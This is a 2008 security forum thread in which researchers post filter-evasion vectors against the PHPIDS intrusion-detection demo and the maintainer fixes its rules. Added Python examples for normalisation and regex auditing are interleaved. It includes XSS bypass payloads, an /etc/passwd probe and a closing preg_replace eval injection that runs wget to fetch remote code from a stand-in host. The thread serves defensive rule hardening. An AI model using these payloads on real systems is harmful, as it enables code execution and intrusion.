Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Gareth Heyes
Date: May 30, 2008 06:57AM

Most annoying one ever :)

do alert(1);while(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.7 OMGOMGOMG!!1)
Posted by: Anonymous User
Date: May 30, 2008 08:50AM

Eeek - annoying indeed. And fixed. Damn - I am surprised this still worked. Do I have to say great find again or is this already implicitly included? ;)

Thanks!

Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: May 30, 2008 10:58AM

Two-stage injection, with thanks to Gareth.

code is:
switch('foo bar foo bar foo bar') {case eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array):}

Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: May 30, 2008 11:49AM

@thornmaker

Nice! :)


Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: May 30, 2008 12:29PM

Another variation, slightly shorter.

code:
if(0){} else eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array)
'foo bar foo bar foo'

Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: May 31, 2008 11:34PM

Warning, this might DoS your browser. At least it does for me with Firefox 3 beta. Opera nicely lets you opt out of the alerts. It doesn't run in IE.

Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 02, 2008 02:36AM

Hi, I wasn't online most of the weekend - so the fixes have been a little bit delayed. The last one is really weird - and I wasn't really sure how to categorize it. I added a new rule fragment to one of the DoS rules - hmmmmm.

Nice finds anyway - thx a lot ;)

Btw - I am currently in testing phase for the new html option - so you can use the PHPIDS in combination with WYSIWYG editors. I will set up a private demo during the next days - the public one will follow later. Anyone interested in the link please drop me a line!

The current roadmap:

0.4.8 - during the next days (rule fixes, converter fixes, more verbosity of the centrifuge)

0.5 - approximately in two or three weeks (same like above plus the html feature)

Greetings,
.mario

Re: PHPIDS (0.4.8 is damn close...)
Posted by: thornmaker
Date: June 02, 2008 04:02AM

I haven't tested them all individually, but at least onfocus alone will still get the job done.


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 02, 2008 05:04AM

@thornmaker

Nice1 again :)

@mario

Count me in of course!


Re: PHPIDS (0.4.8 is damn close...)
Posted by: tx
Date: June 02, 2008 09:14PM

@.mario: link me, I wanna play ! :)

-tx @ lowtech-labs.org

Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 03, 2008 03:08AM

@all: Will be done as soon as ready - I think I will have something testable online around Saturday.

@thornmaker: hmmmmm - kay. Will take care of this asap!

Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 06, 2008 07:05AM

The HTML demo is online - no extra link - just the normal demo with a checkbox. Have fun! (but don't expect wonders - it's the very first testing version ;) )

Example:
HTML allowed
HTML not allowed

HTML allowed (with vector)
HTML not allowed (with vector)

Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 06, 2008 07:20AM

@mario

cool!

I'm confused though, how come this isn't allowed?
http://demo.php-ids.org/?test=%3Cimg+src%3D%22http%3A%2F%2Fwww.google.de%2F%22+%2F%3E&html=on


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 06, 2008 09:04AM

Could be a HTMLPurifier configuration issue - lemme check...

It's the missing alt attribute ;)

Okay - found the issue and fixed it... I guess there are some more tricky tags with mandatory attributes etc.


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 08, 2008 03:12AM

IE8 vector:-
http://demo.php-ids.org/?test=<img%20src=""%20onerror%0C=alert(1)%20alt=1>&html=on


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Anonymous User
Date: June 08, 2008 08:01AM

Ouch and thx - there was a problem in the _diff() method when handling data which was added by the HTMLPurifier. That issue is now fixed besides several other problems.

What still could work is hiding for example SQL injection attack vectors inside HTML attributes. Just pump the vector into the let's say alt tag and neither the PHPIDS nor the HTMLPurifier will notice/do something. I am working on that - but the issue is pretty complicated.

Example


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 25, 2008 02:35PM

My JavaScript protocol fuzzer found some very interesting RTL chars in FF 2.0.0.14

Char: 56320, link: jav&#56320ascript:
Char: 56321, link: jav&#56321ascript:
Char: 56322, link: jav&#56322ascript:
Char: 56323, link: jav&#56323ascript:
Char: 56324, link: jav&#56324ascript:
Char: 56325, link: jav&#56325ascript:
...

All the way to:-
Char: 57343, link: jav&#57343ascript:

These links can get past the PHPIDS using different placement of the characters,
e.g.
<a href="jav&#56325ascript:al&#56325ert(1)">test</a>

Or similar combination


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Matt Presson
Date: June 26, 2008 08:48AM

I couldn't get that to execute, Gareth. Below is what I receive in return from my browser:

Access forbidden!

You don't have permission to access the requested object. It is either read-protected or not readable by the server.

If you think this is a server error, please contact the webmaster.
Error 403
localhost
06/26/08 08:44:33

The url in the address bar is: http://localhost/jav%EF%BF%BDascript:al%EF%BF%BDert(1)

Run on Apache 2.2.8 and accessed in FF3.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 26, 2008 10:07AM

@matt

FF 2.0.0.14 only I'm afraid :(


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Matt Presson
Date: June 26, 2008 01:22PM

AAAhhhhhh!


Re: PHPIDS (0.4.8 is damn close...)
Posted by: Gareth Heyes
Date: June 27, 2008 07:00AM

Hex entities also work if you use a semi-colon:-

From:
Char: 56320, link: jav&#xdc00;ascript:

To:
Char: 57343, link: jav&#xdfff;ascript:


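Gareth's decimal and hex entity findings above both fall in the lone low-surrogate range (U+DC00 to U+DFFF), and they defeat any filter that compares the raw attribute value, because the scheme never appears as one token. The following is an added Python example, not PHPIDS code, of the normalisation a detector can run before matching: decode entities with or without the semicolon, then drop the U+FFFD that a lone surrogate decodes to (the same code point Matt's FF3 address bar shows as %EF%BF%BD) together with control, format and unassigned code points. Which code points a browser skips is an assumption here; the sample links are constructed from the thread's values.

```python
import html
import re
import unicodedata

# Unicode categories a lenient HTML parser may silently skip inside an attribute
# value. Assumption for this example; browsers differ, as the FF2/FF3 results show.
SKIPPED_CATEGORIES = {'Cc', 'Cf', 'Cn', 'Cs'}
SCRIPT_SCHEME = re.compile(r'^\s*(?:javascript|vbscript)\s*:')


def normalise(value):
    """Decode numeric/named entities (';' optional, as browsers do), then drop
    U+FFFD (what html.unescape returns for a lone surrogate such as &#56325 or
    &#xdc00;) and other skippable code points, and lower-case the result."""
    decoded = html.unescape(value)
    kept = [ch for ch in decoded
            if ch != '\ufffd' and unicodedata.category(ch) not in SKIPPED_CATEGORIES]
    return ''.join(kept).lower()


def is_script_url(value):
    """True when the normalised attribute value starts with a script scheme."""
    return SCRIPT_SCHEME.match(normalise(value)) is not None


# Constructed samples modelled on the thread (not captured traffic) -> expected verdict.
SAMPLES = {
    'jav&#56325ascript:al&#56325ert(1)': True,   # decimal entity, no semicolon
    'jav&#xdc00;ascript:alert(1)': True,         # hex entity with semicolon
    # Without the semicolon the greedy hex parse also eats the 'a', so the scheme
    # is lost; this matches Gareth's note that hex entities need the semicolon.
    'jav&#xdc00ascript:alert(1)': False,
    'http://www.google.de/': False,              # benign link from the thread
}

if __name__ == '__main__':
    for raw, expected in SAMPLES.items():
        verdict = is_script_url(raw)
        print(f'{verdict!s:5} {normalise(raw)!r:28} <- {raw!r}')
        assert verdict == expected
```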
Re: PHPIDS (0.5 has landed)
Posted by: Martin
Date: July 07, 2008 03:16AM

Heya,

Finally getting some time and resurrecting the .NETIDS, which was having severe memory consumption issues in its last build :/

Anyway, found a bug in one of the Regex expressions in convertFromJSCharcode:

if (preg_match_all('/\d*[+-\/\* ]\d+/', $char, $matches)) {

This should match optional digits, + or - or / or * or \s, and then digits.

It actually matches optional digits, anything in the ascii range + to / (because inside [] the - functions as a go between indicator), and then digits.

All that needs to be done is to escape the - as \-.

Hope that helps,

Martin

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: PHPIDS (0.5 has landed)
Posted by: Anonymous User
Date: July 09, 2008 06:05PM

Hey Martin - sorry for taking so long to answer. You are right - that +- matches a range indeed. I will deploy the fix tomorrow first thing.

Thx & good to see you here again ;)
.mario

Re: PHPIDS (0.5 has landed)
Posted by: SpoofGhost
Date: July 15, 2008 09:56AM

What about logfile poisoning? Isn't this possible?

Re: PHPIDS (0.5 has landed)
Date: July 15, 2008 12:56PM

Might I suggest for some possible speed improvements and readability you use the character class 'xdigit' such as [:xdigit:] instead of [a-f0-9] and maybe replacing AND|OR|XOR|NAND|NOT with N?AND|X?OR|NOT

Also, correct me if I am wrong, but can't [-\w\/\\\*] be written as [-\w/\\*]?
I was aware you do not need to escape the characters since they are within the [ ] and the only chars to escape are [ and ]. I haven't played around with this stuff for a while so my memory could be off, so don't take my word on this.

Re: PHPIDS (0.5 has landed)
Posted by: Anonymous User
Date: July 16, 2008 04:06PM

@SpoofGhost: What exactly do you mean?

@CM: Nup - unfortunately not - the stupid double escaping is a PHP issue on some versions. The N?AND issue on the other hand is definitely valid - will find its way into the 0.5.2. Thanks man!

Sorry for being pretty unresponsive lately - I can't access slackers from my workplace since our static IP gets banned over and over again... so I can only access the forum from @home - where I crashed pretty seldom the last weeks.

Re: PHPIDS (0.5 has landed)
Date: July 18, 2008 10:51PM

Did you look into the [:xdigit:] class?


(bin|home|conf|usr|etc|proc|opt|sbin|local|dev|tmp|kern|boot|root|sys|system|windows|winnt|program|

can be:

(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|


join|pop|push|reverse|shift|slice|splice|sort|unshift

can be:

join|pop|push|reverse|shift|sp?lice|sort|unshift


echo|print|print_r|var_dump|fopen|popen

can be:

echo|print|print_r|var_dump|[fp]open


(?:http|ftp|https)

can be:

(?:https?|ftp)


Those were all the simple ones I could find in my spare time which did not end up using parentheses which would slow the regex down.

Were the spaces that were added to (N?AND|X?OR|NOT ) intentional or a typo when doing search and replace?

Also, in (?:CONCAT|CHAR|CONCAT|LOAD_FILE|0x) you have CONCAT twice.

Re: PHPIDS (0.5 has landed)
Posted by: Anonymous User
Date: July 19, 2008 07:19AM

Hi,

all optimizations valid - just committed them into the trunk. Thanks a lot! And yes - the last two issues you mentioned were typos ;) Fixed.

Greetings and have a nice weekend,
.mario

Re: PHPIDS (0.5 has landed)
Date: July 19, 2008 09:39AM

I noticed that in a lot of places you use:

[^:\s\w,.-\/?+]

did you mean it to be:

[^:\s\w,.\/?+-]

Otherwise it will think it's a char range from . to /, which according to the ASCII table is just those 2 chars, so the - is unneeded if it was meant to be a range, or the - is being ignored if it was meant to be an included char.

Some other possible ones too:

[+&!-@]
[+-<>=]
[+-=\s]

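Martin's `[+-\/\* ]` report above and the `.-\/`, `!-@`, `+-<` and `+-=` classes in this post are one and the same pitfall: an unescaped hyphen between two characters becomes a range operator. The following is an added Python audit, not PHPIDS code (Python's re stands in for PCRE, which parses these classes the same way): for each class it lists the characters that match only because of the accidental range, and shows the class with the hyphen escaped, so a rule author can check a signature before shipping it. The `arith_match` helper is an assumed stand-in for the convertFromJSCharcode check, with the class made pluggable.

```python
import re

# The audit is restricted to ASCII for readability; the ranges in question are all ASCII.
ASCII = [chr(c) for c in range(128)]


def members(char_class):
    """Set of ASCII characters matched by one regex character class such as '[+-\\/\\* ]'."""
    pattern = re.compile(char_class)
    return {c for c in ASCII if pattern.fullmatch(c)}


def hyphens_literal(char_class):
    """Return the class with every unescaped interior '-' rewritten as '\\-'.
    A '-' first or last in the class (after a leading '^') is already literal."""
    body = char_class[1:-1]
    negate = ''
    if body.startswith('^'):
        negate, body = '^', body[1:]
    out, i = [], 0
    while i < len(body):
        if body[i] == '\\' and i + 1 < len(body):      # keep \s \w \/ etc. intact
            out.append(body[i:i + 2])
            i += 2
            continue
        out.append('\\-' if body[i] == '-' and 0 < i < len(body) - 1 else body[i])
        i += 1
    return '[' + negate + ''.join(out) + ']'


def range_surprise(char_class):
    """Characters whose membership changes once the hyphen is literal: what the
    accidental range adds, or, for a negated class, what it fails to exclude."""
    return members(char_class) ^ members(hyphens_literal(char_class))


def arith_match(text, char_class=r'[+\-\/\* ]'):
    """Martin's digits-operator-digits test; defaults to the escaped (fixed) class."""
    return re.search(r'\d*' + char_class + r'\d+', text) is not None


if __name__ == '__main__':
    # Classes quoted in the thread, as constructed input for the audit.
    for cls in [r'[+-\/\* ]', r'[^:\s\w,.-\/?+]', r'[+&!-@]', r'[+-<>=]', r'[+-=\s]']:
        affected = ''.join(sorted(range_surprise(cls)))
        print(f'{cls:20} -> {hyphens_literal(cls):20} affected: {affected!r}')
```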
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: lpilorz
Date: July 29, 2008 12:10PM

http://demo.php-ids.org/?test=/etc/passwd
is taken as alphanumeric, so signature is not matched

hxxp://demo.php-ids.org/?test=skipcentrifuge {${`wget hxxp://example.com/x.php`}}
my favourite eval/preg_replace exploit


edit: removing second link, was broken by forum

